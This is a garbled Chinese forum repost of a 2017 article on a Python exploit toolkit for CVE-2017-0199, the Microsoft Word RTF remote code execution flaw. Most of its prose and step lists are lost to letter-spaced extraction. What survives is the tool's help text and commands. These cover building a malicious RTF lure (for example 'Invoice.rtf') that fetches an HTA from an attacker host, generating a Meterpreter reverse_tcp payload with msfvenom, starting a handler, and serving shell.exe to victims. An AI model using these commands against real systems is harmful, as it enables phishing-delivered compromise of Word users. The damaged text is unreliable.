[19042] 2017-04-21_针对CVE-2017-0199的Python漏洞利用脚本

文档创建者:s7ckTeam
浏览次数:12
最后更新:2025-01-18
2017-04-21_针对CVE-2017-0199的Python漏洞利用脚本   C V E - 2 0 1 7 - 0 1 9 9     P y t h o n         i n n 0 t e a m   2 0 1 7 - 0 4 - 2 1 i n n 0 t e a m   b h d r e s h       M i c r o s o f t   R T F   R C E p y t h o n R T F   : 1 .   2 .   3 .   : 1 .   使 : E x p l o i t   t o o l k i t   C V E - 2 0 1 7 - 0 1 9 9   -   v 2 . 0 m e t a s p l o i t   /   m e t e r p r e t e r   R T F   R u n   t o o l k i t   i n   a n   e x p l o i t a t i o n   m o d e   a s   t i n y   H T A   +   W e b   s e r v e r :   P y t h o n   v e r s i o n   2 . 7 . 1 3 e m a i l   R T F  
S t e p   1 :     R T F   1 .   2 .   3 .   4 .   S t e p   2     1 .   2 .   3 .   4 .   5 .   S t e p   3 :     1 .   2 .   3 .   4 .   : 1 .   2 .   3 .   4 .   5 .   6 .   7 .   8 .   9 .   1 0 .   1 1 .   1 2 .   1 3 .   1 4 .   1 5 .   1 6 .   1 7 .   1 8 .   1 9 .   2 0 .   2 1 .   2 2 .   2 3 .   2 4 .   2 5 .   2 6 .   T h i s   p r o g r a m   i s   f o r   E d u c a t i o n a l   p u r p o s e   O N L Y .   D o   n o t   u s e   i t   w i t h o u t   p e r m i s s i o n .   T h e   u s u a l   d i s c l a i m e r   a p p l i e s ,   e s p e c i a l l y   t h e   f a c t   t h a t   m e ( b h d r e s h )   i s   n o t   l i a b l e   f o r   a n y   d a m a g e s   c a u s e d   b y   d i r e c t   o r   i n d i r e c t   u s e   o f   t h e   i n f o r m a t i o n   o r   f u n c t i o n a l i t y   p r o v i d e d   b y   t h e s e   p r o g r a m s .   T h e a u t h o r   o r   a n y   I n t e r n e t   p r o v i d e r   b e a r s   N O   r e s p o n s i b i l i t y   f o r   c o n t e n t   o r   m i s u s e   o f   t h e s e   p r o g r a m s   o r   a n y   d e r i v a t i v e s   t h e r e o f .   B y   u s i n g   t h i s p r o g r a m   y o u   a c c e p t   t h e   f a c t   t h a t   a n y   d a m a g e   ( d a t a l o s s ,   s y s t e m   c r a s h ,   s y s t e m   c o m p r o m i s e ,   e t c . )   c a u s e d   b y   t h e   u s e   o f   t h e s e   p r o g r a m s   i s   n o t b h d r e s h ' s   r e s p o n s i b i l i t y . S y n t a x : #   p y t h o n   c v e - 2 0 1 7 - 0 1 9 9 _ t o o l k i t . p y   - M   g e n   - w   < f i l e n a m e . r t f >   - u   < h t t p : / / a t t a c k e r . c o m / t e s t . h t a > E x a m p l e : #   p y t h o n   c v e - 2 0 1 7 - 0 1 9 9 _ t o o l k i t . p y   - M   g e n   - w   I n v o i c e . r t f   - u   h t t p : / / 1 9 2 . 1 6 8 . 5 6 . 1 / l o g o . d o c m s f   p a y l o a d E x a m p l e : G e n e r a t e   P a y l o a d : #   m s f v e n o m   - p   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p   L H O S T = 1 9 2 . 1 6 8 . 5 6 . 1   L P O R T = 4 4 4 4   - f   e x e   >   / t m p / s h e l l . e x e S t a r t   H a n d l e r : #   m s f c o n s o l e   - x   " u s e   m u l t i / h a n d l e r ;   s e t   P A Y L O A D   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p ;   s e t   L H O S T   1 9 2 . 1 6 8 . 5 6 . 1 ;   r u n " m s f   p a y l o a d S y n t a x : #   p y t h o n   c v e - 2 0 1 7 - 0 1 9 9 _ t o o l k i t . p y   - M   e x p   - e   < h t t p : / / a t t a c k e r . c o m / s h e l l . e x e >   - l   < / t m p / s h e l l . e x e > E x a m p l e : #   p y t h o n   c v e - 2 0 1 7 - 0 1 9 9 _ t o o l k i t . p y   - M   e x p   - e   h t t p : / / 1 9 2 . 1 6 8 . 5 6 . 1 / s h e l l . e x e   - l   / t m p / s h e l l . e x e #   p y t h o n   c v e - 2 0 1 7 - 0 1 9 9 _ t o o l k i t . p y   - h T h i s   i s   a   h a n d y   t o o l k i t   t o   e x p l o i t   C V E - 2 0 1 7 - 0 1 9 9   ( M i c r o s o f t   W o r d   R T F   R C E ) M o d e s : - M   g e n                                                                                     G e n e r a t e   M a l i c i o u s   R T F   f i l e   o n l y           G e n e r a t e   m a l i c i o u s   R T F   f i l e :             - w   < F i l e n a m e . r t f >                                       N a m e   o f   m a l i c i o u s   R T F   f i l e   ( S h a r e   t h i s   f i l e   w i t h   v i c t i m ) .             - u   < h t t p : / / a t t a c k e r . c o m / t e s t . h t a >       T h e   p a t h   t o   a n   h t a   f i l e .   N o r m a l l y ,   t h i s   s h o u l d   b e   a   d o m a i n   o r   I P   w h e r e   t h i s   t o o l   i s   r u n n i n g .                                                                                           F o r   e x a m p l e ,   h t t p : / / a t t a c k e r i p . c o m / t e s t . h t a   ( T h i s   U R L   w i l l   b e   i n c l u d e d   i n   m a l i c i o u s   R T F   f i l e   a n d                                                                                           w i l l   b e   r e q u e s t e d   o n c e   v i c t i m   w i l l   o p e n   m a l i c i o u s   R T F   f i l e . - M   e x p                                                                                     S t a r t   e x p l o i t a t i o n   m o d e           E x p l o i t a t i o n :             - p   < T C P   p o r t : D e f a u l t   8 0 >                         L o c a l   p o r t   n u m b e r .             - e   < h t t p : / / a t t a c k e r . c o m / s h e l l . e x e >     T h e   p a t h   o f   a n   e x e c u t a b l e   f i l e   /   m e t e r p r e t e r   s h e l l   /   p a y l o a d     w h i c h   n e e d s   t o   b e   e x e c u t e d   o n   t a r g e t .             - l   < / t m p / s h e l l . e x e >                                   L o c a l   p a t h   o f   a n   e x e c u t a b l e   f i l e   /   m e t e r p r e t e r   s h e l l   /   p a y l o a d   ( I f   p a y l o a d   i s   h o s t e d   l o c a l l y ) .
i n n 0 t e a m     i n n 0 t e a m
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则